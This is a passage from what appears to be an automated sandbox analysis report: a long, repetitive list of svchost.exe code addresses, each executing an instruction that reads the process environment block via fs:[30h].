            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038663FF mov eax, dword ptr fs:[00000030h] 1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h] 1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h] 1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h] 1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h] 1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390634F mov eax, dword ptr fs:[00000030h] 1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D437C mov eax, dword ptr fs:[00000030h] 1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h] 1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382823B mov eax, dword ptr fs:[00000030h] 1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h] 1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h] 1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390625D mov eax, dword ptr fs:[00000030h] 1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h] 1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836259 mov eax, dword ptr fs:[00000030h] 1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382826B mov eax, dword ptr fs:[00000030h] 1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03870185 mov eax, dword ptr fs:[00000030h] 1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h] 1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h] 1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h] 1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03860124 mov eax, dword ptr fs:[00000030h] 1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
